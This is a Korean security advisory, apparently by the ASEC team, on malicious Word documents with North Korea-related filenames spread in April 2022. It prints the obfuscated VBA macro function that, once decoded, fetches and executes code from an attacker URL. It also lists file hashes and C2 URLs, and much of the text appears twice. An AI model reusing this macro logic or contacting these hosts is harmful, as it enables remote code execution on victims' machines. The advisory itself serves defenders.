외교/안보 관련 내용의 워드문서 유포 중
Contents
ASEC 분석팀은 대북 관련 파일명으로 악성 워드 문서가 지속적으로 유포되고 있음을 확인하였다.
워드 문서에는 악성 VBA 매크로 코드가 포함되어 있으며 <대북 관련 본문 내용 악성 워드의 지속 유포 정황 확인>에서 소개한 문서 파일과 동일한 유형으로 확인된다. 최근 유포가 확인된 워드 문서의 파일명은 다음과 같다.
- 220426-북한의 외교정책과 우리의 대응방향(정**박사).doc (4/26)
- 북한의 외교정책과 우리의 대응방향.doc (4/26)
- 중국의 외교정책과 우리의 대응방향.doc (4/22)
- 보도자료-원코리아국제포럼 2022 -20220422.docm (4/23)
- [분석자료] 4.25 열병식을 통해 본 북한의 핵무력 사용 입장과 군부 엘리트 변동의 함의.docm (4/26)
확인된 매크로 코드에는 특정 URL에 접속하여 받아온 데이터를 실행하는 코드가 포함되어 있다. ‘북한의 외교정책과 우리의 대응방향.doc’ 파일에서 확인된 매크로 코드에는 다음과 같이 난독화된 문자열이 존재한다.
Function Unpck(idx) sa = Array("pi^c$", "wi^n$m~g^mts^:w^in@3^2_$pro~ces`s", "1q^a$z~2^wsx^", "On^ $E~r^ror^ R^es@u^me$ Ne~xt:`Set@ m@x $= ^Cr^ea`teO`b`je~ct^(`""~Mi^cro^so~ft$.X`MLH$TT`P""~):`mx^.op$en@ ""`GE@T`"",` ^""~h^tt`p:/$/g0`0gl`edr^iv^e`.^myw@eb^com`[email protected]~rg`/f^il~e~/up^lo`ad^/li`st$.p`h^p?$qu`ery$=^1""~, F$al@se~:mx$.S`end@:$Ex$e@cu`te(`mx.^re$spo`ns~eT`ex^t)", "\v^e$r~s^ion^.i^ni@", "ws^c$r~i^pt.^ex^e @/^/e$:vb~scr`ipt@ /@/b$ ") Key = "@ $ ~ ` ^" s = sa(idx) arrkey = Split(Key) For Each k In arrkey s = Replace(s, k, "") Next Unpck = s End Function
난독화된 …
워드 문서에는 악성 VBA 매크로 코드가 포함되어 있으며 <대북 관련 본문 내용 악성 워드의 지속 유포 정황 확인>에서 소개한 문서 파일과 동일한 유형으로 확인된다. 최근 유포가 확인된 워드 문서의 파일명은 다음과 같다.
- 220426-북한의 외교정책과 우리의 대응방향(정**박사).doc (4/26)
- 북한의 외교정책과 우리의 대응방향.doc (4/26)
- 중국의 외교정책과 우리의 대응방향.doc (4/22)
- 보도자료-원코리아국제포럼 2022 -20220422.docm (4/23)
- [분석자료] 4.25 열병식을 통해 본 북한의 핵무력 사용 입장과 군부 엘리트 변동의 함의.docm (4/26)
확인된 매크로 코드에는 특정 URL에 접속하여 받아온 데이터를 실행하는 코드가 포함되어 있다. ‘북한의 외교정책과 우리의 대응방향.doc’ 파일에서 확인된 매크로 코드에는 다음과 같이 난독화된 문자열이 존재한다.
Function Unpck(idx) sa = Array("pi^c$", "wi^n$m~g^mts^:w^in@3^2_$pro~ces`s", "1q^a$z~2^wsx^", "On^ $E~r^ror^ R^es@u^me$ Ne~xt:`Set@ m@x $= ^Cr^ea`teO`b`je~ct^(`""~Mi^cro^so~ft$.X`MLH$TT`P""~):`mx^.op$en@ ""`GE@T`"",` ^""~h^tt`p:/$/g0`0gl`edr^iv^e`.^myw@eb^com`[email protected]~rg`/f^il~e~/up^lo`ad^/li`st$.p`h^p?$qu`ery$=^1""~, F$al@se~:mx$.S`end@:$Ex$e@cu`te(`mx.^re$spo`ns~eT`ex^t)", "\v^e$r~s^ion^.i^ni@", "ws^c$r~i^pt.^ex^e @/^/e$:vb~scr`ipt@ /@/b$ ") Key = "@ $ ~ ` ^" s = sa(idx) arrkey = Split(Key) For Each k In arrkey s = Replace(s, k, "") Next Unpck = s End Function
난독화된 …
IoC
0a0f858beeb6914aaf07896b7790a1d4
657b538698483f43aada2e5e4bc4a91d
cb2a18028055cdf1582c1c5ac3756203
http://g00gledrive.mywebcommunity.org/file/upload/list.php?query=1
http://impartment.myartsonline.com/file/upload/list.php?query=1
657b538698483f43aada2e5e4bc4a91d
cb2a18028055cdf1582c1c5ac3756203
http://g00gledrive.mywebcommunity.org/file/upload/list.php?query=1
http://impartment.myartsonline.com/file/upload/list.php?query=1